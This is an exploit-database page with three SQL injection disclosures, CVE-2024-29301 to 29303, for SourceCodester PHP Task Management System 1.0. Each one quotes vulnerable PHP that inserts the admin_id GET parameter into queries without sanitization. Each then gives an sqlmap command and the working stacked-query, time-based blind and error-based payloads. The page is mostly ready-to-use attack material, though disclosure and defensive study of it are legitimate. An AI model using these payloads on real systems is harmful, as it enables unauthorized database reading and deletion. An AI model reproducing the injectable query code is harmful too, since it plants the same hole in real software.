Share
## https://sploitus.com/exploit?id=PACKETSTORM:177737
# Exploit Title: SourceCodester PHP Task Management System 1.0 (update-employee.php) - SQL Injection  
# Date: 22 March 2024  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip  
# Version: v1.0  
# CVE: CVE-2024-29302  
# Tested on: Mac OSX, XAMPP, Apache, MySQL  
  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
Source Code(taskmatic/update-employee.php):  
  
$admin_id = $_GET['admin_id'];  
if(isset($_POST['update_current_employee'])){  
$obj_admin->update_user_data($_POST,$admin_id);  
}  
if(isset($_POST['btn_user_password'])){  
$obj_admin->update_user_password($_POST,$admin_id);  
}  
$sql = "SELECT * FROM tbl_admin WHERE user_id='$admin_id' ";  
$info = $obj_admin->manage_all_info($sql);  
$row = $info->fetch(PDO::FETCH_ASSOC);  
  
-> sqlmap -u "http://localhost/taskmatic/taskmatic/update-employee.php?admin_id=1" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs  
---  
Parameter: admin_id (GET)  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: admin_id=1';SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: admin_id=1' AND (SELECT 3843 FROM (SELECT(SLEEP(5)))GLKx)-- mLKZ  
---  
  
  
  
  
# Exploit Title: SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection  
# Date: 22 March 2024  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip  
# Version: v1.0  
# CVE: CVE-2024-29303  
# Tested on: Mac OSX, XAMPP, Apache, MySQL  
  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
Source Code(taskmatic/admin-manage-user.php):  
  
if(isset($_GET['delete_user'])){  
$action_id = $_GET['admin_id'];  
  
$task_sql = "DELETE FROM task_info WHERE t_user_id = $action_id";  
$delete_task = $obj_admin->db->prepare($task_sql);  
$delete_task->execute();  
  
$attendance_sql = "DELETE FROM attendance_info WHERE atn_user_id = $action_id";  
$delete_attendance = $obj_admin->db->prepare($attendance_sql);  
$delete_attendance->execute();  
  
$sql = "DELETE FROM tbl_admin WHERE user_id = :id";  
$sent_po = "admin-manage-user.php";  
$obj_admin->delete_data_by_this_method($sql,$action_id,$sent_po);  
}  
  
-> sqlmap -u "http://localhost/taskmatic/taskmatic/admin-manage-user.php?delete_user=delete_user&admin_id=28" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs  
---  
Parameter: admin_id (GET)  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: delete_user=delete_user&admin_id=28;SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: delete_user=delete_user&admin_id=28 AND (SELECT 9863 FROM (SELECT(SLEEP(5)))wYJM)  
---  
  
  
  
  
# Exploit Title: SourceCodester PHP Task Management System 1.0 (update-admin.php) - SQL Injection  
# Date: 22 March 2024  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip  
# Version: v1.0  
# CVE: CVE-2024-29301  
# Tested on: Mac OSX, XAMPP, Apache, MySQL  
  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
Source Code(taskmatic/update-admin.php):  
  
$admin_id = $_GET['admin_id'];  
if(isset($_POST['update_current_employee'])){  
$obj_admin->update_admin_data($_POST,$admin_id);  
}  
if(isset($_POST['btn_user_password'])){  
$obj_admin->update_user_password($_POST,$admin_id);  
}  
$sql = "SELECT * FROM tbl_admin WHERE user_id='$admin_id' ";  
$info = $obj_admin->manage_all_info($sql);  
$row = $info->fetch(PDO::FETCH_ASSOC);  
  
  
-> sqlmap -u "http://localhost/taskmatic/taskmatic/update-admin.php?admin_id=1" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch -dbs  
---  
Parameter: admin_id (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: admin_id=1' AND (SELECT 6339 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(6339=6339,1))),0x7176707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ivgj  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: admin_id=1';SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: admin_id=1' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))mEAi)-- QnHT  
---